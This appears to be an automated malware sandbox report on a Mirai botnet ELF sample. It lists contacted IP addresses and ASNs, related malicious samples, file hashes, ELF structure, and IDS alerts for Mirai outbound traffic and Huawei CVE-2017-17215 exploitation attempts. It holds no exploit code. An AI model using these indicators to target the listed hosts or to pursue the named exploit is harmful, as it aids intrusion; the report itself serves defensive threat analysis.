        unknownSouth Africa
        36994Vodacom-VBZAfalse
        41.106.43.141
        unknownAlgeria
        36947ALGTEL-ASDZfalse
        197.177.27.81
        unknownKenya
        33771SAFARICOM-LIMITEDKEfalse
        135.134.164.239
        unknownUnited States
        14962NCR-252USfalse
        112.4.118.198
        unknownChina
        56046CMNET-JIANGSU-APChinaMobilecommunicationscorporationCNfalse
        85.179.29.187
        unknownGermany
        6805TDDE-ASN1DEfalse
        95.71.223.69
        unknownRussian Federation
        12389ROSTELECOM-ASRUfalse
        74.201.246.182
        unknownUnited States
        18692NEUBERGERUSfalse
        31.94.62.202
        unknownUnited Kingdom
        12576EELtdGBfalse
        31.241.19.184
        unknownGermany
        3320DTAGInternetserviceprovideroperationsDEfalse
        94.150.243.133
        unknownDenmark
        9158TELENOR_DANMARK_ASDKfalse
        62.141.160.83
        unknownGermany
        20588FVBDEfalse
        41.186.210.232
        unknownRwanda
        36890MTNRW-ASNRWfalse
        62.81.118.91
        unknownSpain
        6739ONO-ASCableuropa-ONOESfalse
        94.247.246.42
        unknownRussian Federation
        48532TELEPORTSPB-ASRUfalse
        62.54.189.138
        unknownGermany
        6805TDDE-ASN1DEfalse
        88.37.136.160
        unknownItaly
        3269ASN-IBSNAZITfalse
        62.225.64.127
        unknownGermany
        3320DTAGInternetserviceprovideroperationsDEfalse
        112.249.78.43
        unknownChina
        4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
        94.78.205.88
        unknownRussian Federation
        12389ROSTELECOM-ASRUfalse
        146.186.226.230
        unknownUnited States
        3999PENN-STATEUSfalse
        95.212.143.82
        unknownSyrian Arab Republic
        29256INT-PDN-STE-ASSTEPDNInternalASSYfalse
        85.130.122.0
        unknownBulgaria
        13124IBGCBGfalse
        112.93.190.73
        unknownChina
        17816CHINA169-GZChinaUnicomIPnetworkChina169Guangdongprovifalse
        95.85.184.251
        unknownSerbia
        41897SAT-TRAKT-ASSerbiaRSfalse
        95.137.230.210
        unknownGeorgia
        34797SYSTEM-NETGEfalse
        112.50.147.82
        unknownChina
        9808CMNET-GDGuangdongMobileCommunicationCoLtdCNfalse
        88.199.11.205
        unknownPoland
        20960TKTELEKOM-ASPLfalse
        95.225.107.162
        unknownItaly
        3269ASN-IBSNAZITfalse
        112.65.115.233
        unknownChina
        17621CNCGROUP-SHChinaUnicomShanghainetworkCNfalse
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        121.197.237.36IuWv0ujyis.elfGet hashmaliciousMiraiBrowse
          31.210.249.115mM4FIrNQdC.elfGet hashmaliciousMiraiBrowse
            Tsunami.armGet hashmaliciousMiraiBrowse
              MWrbHh28KFGet hashmaliciousMiraiBrowse
                q9eJakfTloGet hashmaliciousMiraiBrowse
                  41.97.15.218kf2mCAp6QY.elfGet hashmaliciousMiraiBrowse
                    bk.mpsl-20221002-0023.elfGet hashmaliciousMiraiBrowse
                      s6ls86HLf3.elfGet hashmaliciousUnknownBrowse
                        sN5ZhpqFu5Get hashmaliciousMiraiBrowse
                          94.102.16.25Tsunami.arm7Get hashmaliciousMiraiBrowse
                            95.255.225.237yt74oGF5J9Get hashmaliciousMiraiBrowse
                              sora.arm7Get hashmaliciousMiraiBrowse
                                62.92.203.157vfNQDTg3R7.elfGet hashmaliciousMiraiBrowse
                                  94.98.191.219KbRuYuQKsHGet hashmaliciousMiraiBrowse
                                    bk4oixKbpcGet hashmaliciousMiraiBrowse
                                      apep.mipsGet hashmaliciousMiraiBrowse
                                        95.20.61.26CbQQz2EiVz.elfGet hashmaliciousMiraiBrowse
                                          ZZGtHtjrEcGet hashmaliciousMiraiBrowse
                                            arm6Get hashmaliciousMirai MoobotBrowse
                                              lAbrw2L5lmGet hashmaliciousMiraiBrowse
                                                rQ04dnvZouGet hashmaliciousMiraiBrowse
                                                  197.141.53.63lok.arm5.elfGet hashmaliciousMiraiBrowse
                                                    8TTFrTs5E6.elfGet hashmaliciousMiraiBrowse
                                                      TtGZLMEeM9Get hashmaliciousUnknownBrowse
                                                        arm7Get hashmaliciousMirai, MoobotBrowse
                                                          armGet hashmaliciousMiraiBrowse
                                                            No context
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            ERI-ASUSGYJlSQv5u1.elfGet hashmaliciousMiraiBrowse
                                                            • 148.135.13.34
                                                            j5dP128j0u.elfGet hashmaliciousMiraiBrowse
                                                            • 161.37.126.52
                                                            LBnSElIVYu.elfGet hashmaliciousMiraiBrowse
                                                            • 164.56.174.129
                                                            gRh9D7FLBb.elfGet hashmaliciousMiraiBrowse
                                                            • 129.200.0.206
                                                            vr8aIICuNG.elfGet hashmaliciousMiraiBrowse
                                                            • 153.88.168.219
                                                            3ZCVTnKE2z.elfGet hashmaliciousMiraiBrowse
                                                            • 153.89.233.76
                                                            FOr8baSOyH.elfGet hashmaliciousMiraiBrowse
                                                            • 136.225.109.238
                                                            HTzqF6PxCs.elfGet hashmaliciousUnknownBrowse
                                                            • 161.37.151.48
                                                            huhu.x86.elfGet hashmaliciousMiraiBrowse
                                                            • 129.192.46.215
                                                            QEjgJ5JlUJ.elfGet hashmaliciousMiraiBrowse
                                                            • 161.37.114.13
                                                            ICOSNET-ASDZmips-20240214-0633.elfGet hashmaliciousMirai, MoobotBrowse
                                                            • 197.140.144.193
                                                            arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                            • 197.141.7.46
                                                            arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                            • 197.143.225.162
                                                            x86.elfGet hashmaliciousMiraiBrowse
                                                            • 197.143.201.66
                                                            xsqY3IuVwf.elfGet hashmaliciousMiraiBrowse
                                                            • 197.143.201.62
                                                            COWJ55ChOf.elfGet hashmaliciousMirai, MoobotBrowse
                                                            • 197.141.65.16
                                                            sGGQ6sAexo.elfGet hashmaliciousMirai, MoobotBrowse
                                                            • 197.143.173.249
                                                            YGPDW8cL6B.elfGet hashmaliciousMiraiBrowse
                                                            • 197.141.7.46
                                                            bT5nWJkvh0.elfGet hashmaliciousUnknownBrowse
                                                            • 197.141.89.123
                                                            huhu.mips-20240212-0910.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 197.143.201.42
                                                            SWISSCOMSwisscomSwitzerlandLtdCHpTl791h3wF.elfGet hashmaliciousMiraiBrowse
                                                            • 85.4.129.132
                                                            F13Qfddhfp.elfGet hashmaliciousMiraiBrowse
                                                            • 85.4.56.52
                                                            nDBq0aXLc9.elfGet hashmaliciousUnknownBrowse
                                                            • 85.5.200.76
                                                            wtN5CU3IaE.elfGet hashmaliciousMiraiBrowse
                                                            • 164.207.58.22
                                                            kPi1ZPi0IK.elfGet hashmaliciousMiraiBrowse
                                                            • 85.2.87.109
                                                            b3astmode.x86.elfGet hashmaliciousMiraiBrowse
                                                            • 92.104.73.15
                                                            4zzfaP8ZkQ.elfGet hashmaliciousMiraiBrowse
                                                            • 164.192.31.254
                                                            KCxIT6JVng.elfGet hashmaliciousMiraiBrowse
                                                            • 199.58.15.47
                                                            Scanned Docs#U007eSHYD-231214453#U007eYD-B8243 70-30#U007eCFR#U007eDrums.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                            • 193.222.96.21
                                                            bUWnUFdTDm.elfGet hashmaliciousMiraiBrowse
                                                            • 83.76.48.173
                                                            LEVEL3USo76OXXA64s.elfGet hashmaliciousMiraiBrowse
                                                            • 64.152.16.235
                                                            Omkyhy25l0.elfGet hashmaliciousMiraiBrowse
                                                            • 4.54.239.163
                                                            prkdxMl4PN.elfGet hashmaliciousMiraiBrowse
                                                            • 4.111.140.105
                                                            lGeRX8rqsG.elfGet hashmaliciousMiraiBrowse
                                                            • 9.220.125.124
                                                            wtN5CU3IaE.elfGet hashmaliciousMiraiBrowse
                                                            • 9.222.238.94
                                                            sora.arm.elfGet hashmaliciousMiraiBrowse
                                                            • 8.249.35.159
                                                            sora.arm7.elfGet hashmaliciousMiraiBrowse
                                                            • 4.237.213.119
                                                            sora.x86.elfGet hashmaliciousMiraiBrowse
                                                            • 4.190.66.151
                                                            mpsl-20240214-0634.elfGet hashmaliciousMirai, MoobotBrowse
                                                            • 8.0.124.246
                                                            mips-20240214-0633.elfGet hashmaliciousMirai, MoobotBrowse
                                                            • 8.80.210.108
                                                            ALGTEL-ASDZF13Qfddhfp.elfGet hashmaliciousMiraiBrowse
                                                            • 41.105.231.126
                                                            o76OXXA64s.elfGet hashmaliciousMiraiBrowse
                                                            • 41.102.136.81
                                                            nDBq0aXLc9.elfGet hashmaliciousUnknownBrowse
                                                            • 41.106.222.6
                                                            prkdxMl4PN.elfGet hashmaliciousMiraiBrowse
                                                            • 41.102.161.12
                                                            sora.x86.elfGet hashmaliciousMiraiBrowse
                                                            • 41.97.63.134
                                                            mpsl-20240214-0634.elfGet hashmaliciousMirai, MoobotBrowse
                                                            • 41.200.121.245
                                                            mips-20240214-0633.elfGet hashmaliciousMirai, MoobotBrowse
                                                            • 154.254.140.4
                                                            arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                            • 41.101.17.127
                                                            arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                            • 197.115.194.114
                                                            NOz0E5iqkk.elfGet hashmaliciousMiraiBrowse
                                                            • 105.100.195.10
                                                            No context
                                                            No context
                                                            No created / dropped files found
                                                            File type:ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
                                                            Entropy (8bit):6.308666934421888
                                                            TrID:
                                                            • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                            File name:uR2hnJKQGC.elf
                                                            File size:78'808 bytes
                                                            MD5:926c4d6271ff789f1b7869fc177e499c
                                                            SHA1:2159fc1cc9637faa0eb07ba90c92f7f8036b0cdf
                                                            SHA256:24fd0b5356f7ee751cc3a2746ea6da9a273e5771c6b9708a146f38b766f63ce8
                                                            SHA512:bd4a5607d781d277256c5fe4c8735c2b7198c261edc9349cf0de53d84a08edde97010a2c4868e1c5f3a8a8cada2277630456b12c4022e67ba8638e73082ddc6c
                                                            SSDEEP:1536:jvXzeOyllm0KfPKizrqw6agTLfKRslO8Ad:jvjeOyODV6w7PROO
                                                            TLSH:16735CD9A8025D3CF85BE6BD94220F09E924231557D30F2BE5AEFDD36D731689E02D82
                                                            File Content Preview:.ELF.......................D...4..2H.....4. ...(....................../.../....... ......./...O...O....(.......... .dt.Q............................NV..a....da...$@N^NuNV..J9..R.f>"y..O. QJ.g.X.#...O.N."y..O. QJ.f.A.....J.g.Hy../.N.X.......R.N^NuNV..N^NuN

                                                            ELF header

                                                            Class:ELF32
                                                            Data:2's complement, big endian
                                                            Version:1 (current)
                                                            Machine:MC68000
                                                            Version Number:0x1
                                                            Type:EXEC (Executable file)
                                                            OS/ABI:UNIX - System V
                                                            ABI Version:0
                                                            Entry Point Address:0x80000144
                                                            Flags:0x0
                                                            ELF Header Size:52
                                                            Program Header Offset:52
                                                            Program Header Size:32
                                                            Number of Program Headers:3
                                                            Section Header Offset:78408
                                                            Section Header Size:40
                                                            Number of Section Headers:10
                                                            Header String Table Index:9
                                                            NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                            NULL0x00x00x00x00x0000
                                                            .initPROGBITS0x800000940x940x140x00x6AX002
                                                            .textPROGBITS0x800000a80xa80x1246a0x00x6AX004
                                                            .finiPROGBITS0x800125120x125120xe0x00x6AX002
                                                            .rodataPROGBITS0x800125200x125200xabc0x00x2A002
                                                            .ctorsPROGBITS0x80014fe00x12fe00x80x00x3WA004
                                                            .dtorsPROGBITS0x80014fe80x12fe80x80x00x3WA004
                                                            .dataPROGBITS0x80014ff40x12ff40x2140x00x3WA004
                                                            .bssNOBITS0x800152080x132080x2d80x00x3WA004
                                                            .shstrtabSTRTAB0x00x132080x3e0x00x0001
                                                            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                            LOAD0x00x800000000x800000000x12fdc0x12fdc6.33330x5R E0x2000.init .text .fini .rodata
                                                            LOAD0x12fe00x80014fe00x80014fe00x2280x5003.05510x6RW 0x2000.ctors .dtors .data .bss
                                                            GNU_STACK0x00x00x00x00x00.00000x6RW 0x4

                                                            Download Network PCAP: filteredfull

                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                            192.168.2.2395.101.158.8753412802839471 02/14/24-09:29:15.514077TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5341280192.168.2.2395.101.158.87
                                                            192.168.2.2395.82.235.4655394802839471 02/14/24-09:29:56.185100TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5539480192.168.2.2395.82.235.46
                                                            192.168.2.2395.213.219.1044546802839471 02/14/24-09:28:41.269000TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4454680192.168.2.2395.213.219.10
                                                            192.168.2.2388.221.204.5255838802839471 02/14/24-09:28:52.970445TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5583880192.168.2.2388.221.204.52
                                                            192.168.2.2388.218.157.22458618802839471 02/14/24-09:30:18.595832TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5861880192.168.2.2388.218.157.224
                                                            192.168.2.2395.58.97.25354036802839471 02/14/24-09:28:41.518311TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5403680192.168.2.2395.58.97.253
                                                            192.168.2.2388.93.162.4235652802839471 02/14/24-09:30:21.598092TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3565280192.168.2.2388.93.162.42
                                                            192.168.2.2395.161.184.15854296802839471 02/14/24-09:28:00.940453TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5429680192.168.2.2395.161.184.158
                                                            192.168.2.23112.155.109.1046040802839471 02/14/24-09:29:27.796858TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4604080192.168.2.23112.155.109.10
                                                            192.168.2.2388.208.41.9647320802839471 02/14/24-09:28:37.792758TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4732080192.168.2.2388.208.41.96
                                                            192.168.2.2395.86.119.22060502802839471 02/14/24-09:29:40.536815TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)6050280192.168.2.2395.86.119.220
                                                            192.168.2.23112.213.117.1047128802839471 02/14/24-09:29:05.894404TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4712880192.168.2.23112.213.117.10
                                                            192.168.2.2395.250.222.2237234802839471 02/14/24-09:29:18.314666TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3723480192.168.2.2395.250.222.22
                                                            192.168.2.2395.101.215.16933032802839471 02/14/24-09:28:10.720737TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3303280192.168.2.2395.101.215.169
                                                            192.168.2.23112.178.184.12939216802839471 02/14/24-09:29:28.079170TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3921680192.168.2.23112.178.184.129
                                                            192.168.2.2395.213.203.3437292802839471 02/14/24-09:27:45.924535TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3729280192.168.2.2395.213.203.34
                                                            192.168.2.23112.12.91.12451818802839471 02/14/24-09:30:12.699003TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5181880192.168.2.23112.12.91.124
                                                            192.168.2.23197.214.103.17450032372152835222 02/14/24-09:29:39.586861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5003237215192.168.2.23197.214.103.174
                                                            192.168.2.2395.9.78.22752802802839471 02/14/24-09:28:06.861420TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5280280192.168.2.2395.9.78.227
                                                            192.168.2.2388.170.210.21855808802839471 02/14/24-09:28:53.175369TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5580880192.168.2.2388.170.210.218
                                                            192.168.2.2395.100.54.1547280802839471 02/14/24-09:29:46.109060TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4728080192.168.2.2395.100.54.15
                                                            192.168.2.2395.211.144.7955208802839471 02/14/24-09:29:55.853223TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5520880192.168.2.2395.211.144.79
                                                            192.168.2.23112.30.176.8637432802839471 02/14/24-09:30:11.242004TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3743280192.168.2.23112.30.176.86
                                                            192.168.2.2395.100.81.19941186802839471 02/14/24-09:30:18.787133TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4118680192.168.2.2395.100.81.199
                                                            192.168.2.2395.86.86.2741196802839471 02/14/24-09:30:25.558950TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4119680192.168.2.2395.86.86.27
                                                            192.168.2.2388.99.253.24759222802839471 02/14/24-09:28:53.175062TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5922280192.168.2.2388.99.253.247
                                                            192.168.2.2395.128.144.3758408802839471 02/14/24-09:29:18.517066TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5840880192.168.2.2395.128.144.37
                                                            192.168.2.23112.197.68.11034286802839471 02/14/24-09:28:51.397470TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3428680192.168.2.23112.197.68.110
                                                            192.168.2.2395.163.238.16649336802839471 02/14/24-09:30:14.281752TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4933680192.168.2.2395.163.238.166
                                                            192.168.2.2395.182.152.6858572802839471 02/14/24-09:30:25.517305TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5857280192.168.2.2395.182.152.68
                                                            192.168.2.23112.74.44.2834200802839471 02/14/24-09:29:00.504761TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3420080192.168.2.23112.74.44.28
                                                            192.168.2.23112.126.222.18240710802839471 02/14/24-09:29:52.364895TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4071080192.168.2.23112.126.222.182
                                                            192.168.2.2395.101.83.2655252802839471 02/14/24-09:29:53.093051TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5525280192.168.2.2395.101.83.26
                                                            192.168.2.2388.221.180.21459274802839471 02/14/24-09:30:15.991456TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5927480192.168.2.2388.221.180.214
                                                            192.168.2.23112.74.1.22244164802839471 02/14/24-09:27:52.719402TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4416480192.168.2.23112.74.1.222
                                                            192.168.2.2395.179.188.23958322802839471 02/14/24-09:28:13.876981TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5832280192.168.2.2395.179.188.239
                                                            192.168.2.2388.135.68.19349062802839471 02/14/24-09:28:35.079548TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4906280192.168.2.2388.135.68.193
                                                            192.168.2.2388.195.136.19432944802839471 02/14/24-09:28:53.179772TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3294480192.168.2.2388.195.136.194
                                                            192.168.2.2388.149.218.24251530802839471 02/14/24-09:29:45.439034TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5153080192.168.2.2388.149.218.242
                                                            192.168.2.2395.163.53.13458714802839471 02/14/24-09:27:55.239492TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5871480192.168.2.2395.163.53.134
                                                            192.168.2.23112.125.217.15846366802839471 02/14/24-09:29:52.366517TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4636680192.168.2.23112.125.217.158
                                                            192.168.2.2395.131.48.10156592802839471 02/14/24-09:29:09.033559TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5659280192.168.2.2395.131.48.101
                                                            192.168.2.2388.84.193.10339682802839471 02/14/24-09:27:53.206199TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3968280192.168.2.2388.84.193.103
                                                            192.168.2.23112.74.74.6038712802839471 02/14/24-09:27:53.323820TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3871280192.168.2.23112.74.74.60
                                                            192.168.2.23112.74.62.9239116802839471 02/14/24-09:29:48.442242TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3911680192.168.2.23112.74.62.92
                                                            192.168.2.2395.57.133.11037876802839471 02/14/24-09:27:59.359606TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3787680192.168.2.2395.57.133.110
                                                            192.168.2.2395.100.0.6847298802839471 02/14/24-09:30:11.853194TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4729880192.168.2.2395.100.0.68
                                                            192.168.2.2395.101.50.433220802839471 02/14/24-09:29:51.909181TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3322080192.168.2.2395.101.50.4
                                                            192.168.2.23112.17.55.2438966802839471 02/14/24-09:29:59.330736TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3896680192.168.2.23112.17.55.24
                                                            192.168.2.2395.100.118.11533342802839471 02/14/24-09:29:32.948024TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3334280192.168.2.2395.100.118.115
                                                            192.168.2.2388.221.39.3449040802839471 02/14/24-09:30:19.010347TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4904080192.168.2.2388.221.39.34
                                                            192.168.2.2395.217.156.15644912802839471 02/14/24-09:29:18.302660TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4491280192.168.2.2395.217.156.156
                                                            192.168.2.2395.100.66.9952802802839471 02/14/24-09:29:51.800966TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5280280192.168.2.2395.100.66.99
                                                            192.168.2.2395.86.103.16446688802839471 02/14/24-09:30:13.103742TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4668880192.168.2.2395.86.103.164
                                                            192.168.2.2395.142.165.18154690802839471 02/14/24-09:28:10.698748TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5469080192.168.2.2395.142.165.181
                                                            192.168.2.2395.216.26.9142096802839471 02/14/24-09:29:53.115648TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4209680192.168.2.2395.216.26.91
                                                            192.168.2.2388.99.135.23057666802839471 02/14/24-09:29:15.699928TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5766680192.168.2.2388.99.135.230
                                                            192.168.2.2395.38.51.6541086802839471 02/14/24-09:29:24.030716TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4108680192.168.2.2395.38.51.65
                                                            192.168.2.2395.111.216.16138552802839471 02/14/24-09:28:33.007962TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3855280192.168.2.2395.111.216.161
                                                            192.168.2.2395.164.33.8460332802839471 02/14/24-09:30:11.455726TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)6033280192.168.2.2395.164.33.84
                                                            192.168.2.23197.49.98.16650630372152829579 02/14/24-09:30:10.064640TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5063037215192.168.2.23197.49.98.166
                                                            192.168.2.23112.46.49.15942870802839471 02/14/24-09:28:22.798197TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4287080192.168.2.23112.46.49.159
                                                            192.168.2.2395.165.192.20640378802839471 02/14/24-09:29:40.530705TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4037880192.168.2.2395.165.192.206
                                                            192.168.2.2388.174.236.23334662802839471 02/14/24-09:28:14.083882TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3466280192.168.2.2388.174.236.233
                                                            192.168.2.2388.221.154.9159104802839471 02/14/24-09:30:07.610728TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5910480192.168.2.2388.221.154.91
                                                            192.168.2.2388.19.69.14642778802839471 02/14/24-09:29:21.153084TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4277880192.168.2.2388.19.69.146
                                                            192.168.2.2395.104.244.15241336802839471 02/14/24-09:30:13.079555TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4133680192.168.2.2395.104.244.152
                                                            192.168.2.2395.56.126.7343212802839471 02/14/24-09:30:13.270714TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4321280192.168.2.2395.56.126.73
                                                            192.168.2.2395.0.232.4651552802839471 02/14/24-09:28:10.755296TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5155280192.168.2.2395.0.232.46
                                                            192.168.2.2395.100.62.12755576802839471 02/14/24-09:28:39.763924TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5557680192.168.2.2395.100.62.127
                                                            192.168.2.2388.122.72.24841540802839471 02/14/24-09:27:54.886606TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4154080192.168.2.2388.122.72.248
                                                            192.168.2.23197.49.60.13150368372152829579 02/14/24-09:28:05.512318TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5036837215192.168.2.23197.49.60.131
                                                            192.168.2.2395.211.206.15245432802839471 02/14/24-09:28:19.729577TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4543280192.168.2.2395.211.206.152
                                                            192.168.2.2388.198.21.24834980802839471 02/14/24-09:29:06.099416TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3498080192.168.2.2388.198.21.248
                                                            192.168.2.2388.164.157.7159356802839471 02/14/24-09:28:37.804076TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5935680192.168.2.2388.164.157.71
                                                            192.168.2.2395.82.231.19051014802839471 02/14/24-09:28:47.397000TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5101480192.168.2.2395.82.231.190
                                                            192.168.2.2395.9.93.1755520802839471 02/14/24-09:29:08.651385TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5552080192.168.2.2395.9.93.17
                                                            192.168.2.2388.248.111.20143080802839471 02/14/24-09:30:18.650489TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4308080192.168.2.2388.248.111.201
                                                            192.168.2.23112.13.125.2658594802839471 02/14/24-09:28:47.559680TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5859480192.168.2.23112.13.125.26
                                                            192.168.2.2395.217.68.12340044802839471 02/14/24-09:28:19.975423TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4004480192.168.2.2395.217.68.123
                                                            192.168.2.2395.100.72.9540486802839471 02/14/24-09:28:32.588379TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4048680192.168.2.2395.100.72.95
                                                            192.168.2.2395.143.177.1260590802839471 02/14/24-09:30:14.259569TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)6059080192.168.2.2395.143.177.12
                                                            192.168.2.2388.221.242.6358984802839471 02/14/24-09:28:50.650445TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5898480192.168.2.2388.221.242.63
                                                            192.168.2.2388.148.64.10350670802839471 02/14/24-09:30:16.028102TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5067080192.168.2.2388.148.64.103
                                                            192.168.2.2395.58.73.8151660802839471 02/14/24-09:29:46.404945TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5166080192.168.2.2395.58.73.81
                                                            192.168.2.2395.85.47.25040170802839471 02/14/24-09:28:32.587179TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4017080192.168.2.2395.85.47.250
                                                            192.168.2.23197.49.60.13150368372152835222 02/14/24-09:28:05.512318TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5036837215192.168.2.23197.49.60.131
                                                            192.168.2.2395.217.224.3037284802839471 02/14/24-09:29:09.043795TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3728480192.168.2.2395.217.224.30
                                                            192.168.2.2395.101.6.18251602802839471 02/14/24-09:28:29.512375TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5160280192.168.2.2395.101.6.182
                                                            192.168.2.2395.101.202.7742220802839471 02/14/24-09:29:46.101370TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4222080192.168.2.2395.101.202.77
                                                            192.168.2.23197.49.98.16650630372152835222 02/14/24-09:30:10.064640TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5063037215192.168.2.23197.49.98.166
                                                            192.168.2.2388.87.90.9736698802839471 02/14/24-09:28:37.625304TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)3669880192.168.2.2388.87.90.97
                                                            192.168.2.23112.74.217.20643644802839471 02/14/24-09:30:13.693546TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4364480192.168.2.23112.74.217.206
                                                            192.168.2.2395.100.52.22948296802839471 02/14/24-09:30:14.254227TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4829680192.168.2.2395.100.52.229
                                                            192.168.2.23112.166.253.25052442802839471 02/14/24-09:29:55.647756TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)5244280192.168.2.23112.166.253.250
                                                            192.168.2.23112.221.197.2642412802839471 02/14/24-09:28:06.593965TCP2839471ETPRO TROJAN Mirai Variant User-Agent (Outbound)4241280192.168.2.23112.221.197.26
